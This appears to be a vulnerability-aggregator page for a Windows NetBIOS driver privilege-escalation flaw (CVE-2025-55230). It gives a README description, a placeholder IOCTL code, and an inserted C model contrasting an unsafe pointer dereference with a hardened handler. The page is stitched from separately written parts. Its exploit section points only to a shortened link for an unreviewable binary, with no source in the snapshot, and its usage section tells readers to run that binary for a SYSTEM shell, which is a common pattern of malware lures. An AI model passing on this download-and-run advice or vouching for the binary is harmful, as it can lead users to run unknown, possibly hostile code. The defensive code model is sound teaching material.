PoC details: 0f259724518e6c5543dfff7d34251aeb0011412a

Source
Related vulnerability
Title: Microsoft Windows MBT Transport driver security vulnerability (CVE-2025-55230)
Description: The Microsoft Windows MBT Transport driver is a driver shipped by Microsoft (United States). It contains a security vulnerability caused by an untrusted pointer dereference, which may lead to local privilege escalation.
Introduction
# CVE-2025-55230 Exploit PoC

## Disclaimer
This tool is intended for security research and educational purposes only. Any use of this code for malicious activities is strictly prohibited. The author is not responsible for any misuse or damage caused by this program. Use at your own risk.

## Description

CVE-2025-55230 is a local privilege escalation vulnerability in the Windows MBT Transport driver (netbt.sys, the NetBIOS over TCP/IP driver), caused by an untrusted pointer dereference. An authenticated user with local access can use the flaw to read or write kernel memory and thereby elevate to SYSTEM.

### Root Cause
The vulnerability lies in the driver's handler for a specific IOCTL (the actual control code is not given here; 0x12345678 is a placeholder, not a value recovered from the binary). When processing that IOCTL, the driver reads a 64-bit pointer value directly from the user-supplied input buffer and dereferences it without probing or otherwise validating it, so the value is used as a kernel address of the caller's choosing. Depending on whether the code path reads through or writes through the pointer, the result is kernel information disclosure or, more seriously, an arbitrary kernel write, which is what makes the flaw usable for privilege escalation. The weakness is classified as CWE-822 (Untrusted Pointer Dereference) and affects confidentiality, integrity and availability.

In the affected code path, the driver assumes the pointer refers to a valid transport-configuration structure but neither probes it with ProbeForRead/ProbeForWrite nor copies the data into kernel-owned memory before using it. Missing probes of this kind are a recurring defect in long-lived driver code such as the legacy NetBIOS over TCP/IP support.
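The following user-mode C model illustrates the pattern described above. It is an added example, not code from this PoC or from netbt.sys: the request and configuration layouts, the field limits, and the fixed user/kernel boundary constant are all assumptions chosen for the illustration. `probe_for_read` mirrors what ProbeForRead checks (alignment, wrap-around, and the user probe address), `handle_ioctl_unsafe` shows the CWE-822 dereference, and `handle_ioctl_safe` shows the capture-probe-copy-validate sequence the driver should have used.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Model of the x64 Windows user/kernel split: every user-mode address lies
 * below MmUserProbeAddress. The value is fixed here for the model; the real
 * kernel exports it as a variable. */
#define USER_PROBE_ADDRESS 0x00007FFFFFFF0000ULL

/* Hypothetical request and configuration layouts; the real netbt.sys
 * structures are not given on this page. */
typedef struct {
    uint64_t config_ptr;   /* caller-controlled pointer embedded in the input buffer */
    uint32_t flags;
    uint32_t reserved;
} TRANSPORT_REQUEST;

typedef struct {
    uint32_t version;
    uint32_t ttl_seconds;
    uint32_t name_len;
} TRANSPORT_CONFIG;

/* Outcome codes with NTSTATUS-like meaning (not the real NTSTATUS values). */
enum status {
    ST_SUCCESS = 0,
    ST_BUFFER_TOO_SMALL,
    ST_DATATYPE_MISALIGNMENT,
    ST_ACCESS_VIOLATION,
    ST_INVALID_PARAMETER
};

/* Model of ProbeForRead: a zero-length probe checks nothing; otherwise the
 * address must be aligned, and [addr, addr+len) must neither wrap around nor
 * reach past the user probe address. */
static enum status probe_for_read(uint64_t addr, size_t len, size_t align)
{
    if (len == 0)
        return ST_SUCCESS;
    if (align == 0 || (align & (align - 1)) != 0)
        return ST_INVALID_PARAMETER;          /* alignment must be a power of two */
    if (addr & (uint64_t)(align - 1))
        return ST_DATATYPE_MISALIGNMENT;
    if (addr + len < addr || addr + len > USER_PROBE_ADDRESS)
        return ST_ACCESS_VIOLATION;
    return ST_SUCCESS;
}

/* Vulnerable pattern (CWE-822): the pointer taken from the input buffer is
 * dereferenced as-is, so a caller can make the driver read any kernel address. */
static enum status handle_ioctl_unsafe(const void *in, size_t in_len, TRANSPORT_CONFIG *out)
{
    const TRANSPORT_REQUEST *req = (const TRANSPORT_REQUEST *)in;
    if (in_len < sizeof *req)
        return ST_BUFFER_TOO_SMALL;
    const TRANSPORT_CONFIG *cfg = (const TRANSPORT_CONFIG *)(uintptr_t)req->config_ptr;
    *out = *cfg;                              /* arbitrary read, no probe */
    return ST_SUCCESS;
}

/* Hardened pattern: capture the request once, probe the embedded pointer as a
 * user address, copy the pointed-to structure into a kernel-owned local, then
 * validate the copy. In a real driver the copy sits inside __try/__except. */
static enum status handle_ioctl_safe(const void *in, size_t in_len, TRANSPORT_CONFIG *out)
{
    TRANSPORT_REQUEST req;
    TRANSPORT_CONFIG cfg;
    enum status st;

    if (in_len < sizeof req)
        return ST_BUFFER_TOO_SMALL;
    memcpy(&req, in, sizeof req);             /* single fetch: no TOCTOU on the request */

    st = probe_for_read(req.config_ptr, sizeof cfg, _Alignof(TRANSPORT_CONFIG));
    if (st != ST_SUCCESS)
        return st;
    memcpy(&cfg, (const void *)(uintptr_t)req.config_ptr, sizeof cfg);

    /* Validate the captured copy, never the user's memory, which may change. */
    if (cfg.version != 1 || cfg.name_len > 255)   /* hypothetical limits */
        return ST_INVALID_PARAMETER;
    *out = cfg;
    return ST_SUCCESS;
}

/* Constructed samples in static storage (a low, user-mode address in any real
 * process): one legitimate configuration and one with an out-of-range field. */
static TRANSPORT_CONFIG sample_cfg    = { 1, 300, 15 };
static TRANSPORT_CONFIG oversized_cfg = { 1, 300, 1000 };
static TRANSPORT_CONFIG last_result;

/* Build a request carrying `ptr` and dispatch it to either handler. */
static enum status run_ioctl(int hardened, uint64_t ptr)
{
    TRANSPORT_REQUEST req = { ptr, 0, 0 };
    return hardened ? handle_ioctl_safe(&req, sizeof req, &last_result)
                    : handle_ioctl_unsafe(&req, sizeof req, &last_result);
}
```

Both handlers accept a legitimate pointer; only the hardened one rejects a kernel address, a wrapping range, or a misaligned pointer before touching memory. The unsafe handler is never called with a bad pointer here because, just as in the kernel, the dereference itself is the fault.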


## Requirements
- Visual Studio 2022 or later
- Windows SDK
- Target OS: Windows 10 1809+, 11 22H2+, Server 2019+

## Exploit
The exploit is distributed only through this shortened link: https://tinyurl.com/3cewapm7. The repository snapshot on this page contains nothing but README.md, so no source is available for review before running the binary.

## Usage
Run the executable as a standard user:
```
CVE-2025-55230.exe
```
It attempts the elevation and, on success, spawns a command prompt running as SYSTEM.

> Warning: Running this on production systems may cause instability or BSOD if offsets are incorrect.
File snapshot

[4.0K] /data/pocs/0f259724518e6c5543dfff7d34251aeb0011412a
└── [2.0K] README.md

0 directories, 1 file
Notes
    1. Prefer accessing the PoC through the original source.
    2. If the source is gone or unreachable, e-mail f.jinxu#gmail.com (replace # with @) to request the local snapshot.